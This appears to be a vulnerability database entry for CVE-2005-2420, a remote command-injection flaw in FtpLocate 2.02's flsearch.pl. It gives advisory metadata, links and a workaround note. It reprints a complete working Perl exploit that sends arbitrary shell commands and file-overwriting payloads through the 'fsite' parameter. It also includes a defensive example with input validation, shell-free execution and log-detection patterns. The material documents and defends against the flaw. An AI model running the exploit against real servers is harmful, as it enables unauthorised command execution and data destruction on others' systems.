CVE-2005-2420
CVSS 10.0
Published: 2005-08-03 00:00:00
Revised: 2016-10-17 23:26:53

[Original] flsearch.pl in FtpLocate 2.02 allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTP GET request.


[CNNVD] FTPLocate 'flsearch.pl' Remote Command Execution Vulnerability (CNNVD-200508-028)

        flsearch.pl in FtpLocate 2.02 allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTP GET request.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2420
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2420
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-028
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=112230697123357&w=2
(UNKNOWN)  BUGTRAQ  20050725 Chroot Security Group Advisory 2005-07-25 -- ftplocate
http://securitytracker.com/id?1014570
(UNKNOWN)  SECTRACK  1014570
http://www.securityfocus.com/bid/14367
(UNKNOWN)  BID  14367
http://xforce.iss.net/xforce/xfdb/21540
(UNKNOWN)  XF  ftplocate-fsite-command-execution(21540)

- Vulnerability information

FTPLocate 'flsearch.pl' Remote Command Execution Vulnerability
Critical  Input validation
2005-08-03 00:00:00 2005-10-20 00:00:00
Remote
        flsearch.pl in FtpLocate 2.02 allows remote attackers to execute arbitrary commands via shell metacharacters in an HTTP GET request.

- Advisories and patches

        No data available

- Vulnerability information (1120)

FtpLocate <= 2.02 (current) Remote Command Execution Exploit (EDBID:1120)
cgi webapps
2005-07-25 Verified
0 newbug
N/A
## A lot of code for a cgi | vuln. 
# /str0ke

#!/usr/bin/perl
#
# FtpLocate <= 2.02 (current) remote exploit
# VERY PRIVATE VERSION
# DO NOT DISTRIBUTE
#
# newbug Tseng [at] chroot.org
#

sub my_socket
{
       my $s=IO::Socket::INET->new(PeerAddr => $host,
                               PeerPort => 80,
                               Proto => "tcp") or die "socket: ";
}
sub ch2hex
{
       $chr = $_[0];
       $out="";
       for($i=0;$i<length($chr);$i++)
       {
               $ch = substr($chr,$i,1);

               if($ch eq "\"")
               {
                       $out.="%5c%22";
               }

               elsif($ch eq "\$")
               {
                       $out.="%5c%24";
               }
               elsif($ch eq "\@")
               {
                       $out.="%5c%40";
               }
               else
               {
                       $out.="%".sprintf("%2.2x",ord($ch));
               }
       }
       $out;
}
sub upload_file
{
       print "local file: ";
       chomp($lfile = <STDIN>);
       print "remote file: ";
       chomp($rfile = <STDIN>);

       my $socket = &my_socket($host);
       print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
       close $socket;
       print "remove $host:$rfile done.\n";

       my @DATA = `cat $lfile`;
       $num=1;
       $total = scalar @DATA;
       foreach $DATA (@DATA)
       {
               $DATA = &ch2hex($DATA);
               my $socket = &my_socket($host);
               print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
               print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";
               sleep(1);
               close $socket;
               $num++;
       }
}
use IO::Socket::INET;

print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "")
{
       $port = 80;
}
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
{
       $ver = "1.0";
}
print "cmd/upload (cmd): ";
chomp ($opt = <STDIN>);
if($opt eq "")
{
       $opt = "cmd";
}
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
{
       $cgi = "/cgi-bin/ftplocate/flsearch.pl";
}
if($ver eq "1.0")
{
       $junk = "HTTP/1.0\n\n";
}
else
{
       $junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language: zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n";
}
if($opt eq "cmd")
{
       while(1){
               print "h4ck3r\@[$host]:~\$ ";
               chomp ($cmd = <STDIN>);
               if($cmd ne "")
               {
                       print "Send command \"$cmd\" to $host ...\n";
                       $socket = &my_socket($host);
                       $cmd =~ s/\s/%20/g;

                       print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
                       print "done.\n";
               }
       }
}
elsif($opt eq "upload")
{
       &upload_file($lfile);
}
	print "done.\n";

# milw0rm.com [2005-07-25]

- Vulnerability information

18305
FtpLocate flsearch.pl fsite Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

FtpLocate contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to flsearch.pl not properly sanitizing user input supplied to the 'fsite' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
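As an added example (not FtpLocate's own code; the search helper and its `--site`/`--query` flags are hypothetical), the two controls that close this class of flaw, an allowlist check on the parameter and execution without a shell, together with a log check for requests whose `fsite` value carries shell metacharacters:

```perl
# Added example, not FtpLocate's code: defensive handling of a CGI
# parameter such as flsearch.pl's 'fsite' before it reaches any command.
use strict;
use warnings;

# Allowlist check: an FTP site name is a hostname, so only letters, digits,
# '.' and '-' in hostname layout are accepted. Shell metacharacters such as
# '|', ';', '`' or '$' are rejected outright instead of being "escaped".
sub validate_fsite {
    my ($fsite) = @_;
    return undef unless defined $fsite && length($fsite) <= 253;
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $fsite =~ /\A$label(?:\.$label)*\z/ ? $fsite : undef;
}

# Run a search helper (hypothetical name and flags) without /bin/sh: the list
# form of system() hands every argument over verbatim, so nothing in $fsite
# can be parsed as shell syntax even if the allowlist above were loosened.
sub run_site_search {
    my ($tool, $fsite, $query) = @_;
    my $site = validate_fsite($fsite) or die "rejected fsite parameter\n";
    system($tool, '--site', $site, '--query', $query) == 0
        or die "helper failed: $?\n";
}

# Detection side: return access-log lines whose URL-decoded fsite value
# carries shell metacharacters, the request shape this CVE describes.
sub suspicious_fsite_requests {
    my @hits;
    for my $line (@_) {
        next unless $line =~ /flsearch\.pl\?([^\s"]+)/;
        my $qs = $1;
        my %params;
        for my $pair (split /&/, $qs) {
            my ($k, $v) = split /=/, $pair, 2;
            $v = '' unless defined $v;
            $v =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;   # URL-decode
            $params{$k} = $v;
        }
        next unless defined $params{fsite};
        push @hits, $line if $params{fsite} =~ /[|;&`\$<>(){}\r\n]/;
    }
    return @hits;
}

# Constructed sample log lines: one benign lookup, one with a piped command.
my @log = (
    '203.0.113.5 - - [25/Jul/2005:10:00:01 +0800] "GET /cgi-bin/ftplocate/flsearch.pl?query=gcc&fsite=ftp.example.org HTTP/1.0" 200 512',
    '203.0.113.9 - - [25/Jul/2005:10:00:07 +0800] "GET /cgi-bin/ftplocate/flsearch.pl?query=xx&fsite=%7Cid%7C HTTP/1.0" 200 88',
);
print "suspicious: $_\n" for suspicious_fsite_requests(@log);
```

Only the second constructed line is reported; the benign hostname passes both the allowlist and the log check.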

- Timeline

2005-07-25 2005-07-15
2005-07-25 Unknown

- Solution

Currently, there are no known upgrades or official patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s): apply the unofficial patch supplied by Chroot Security Group in their advisory.

- Related references

- Vulnerability author
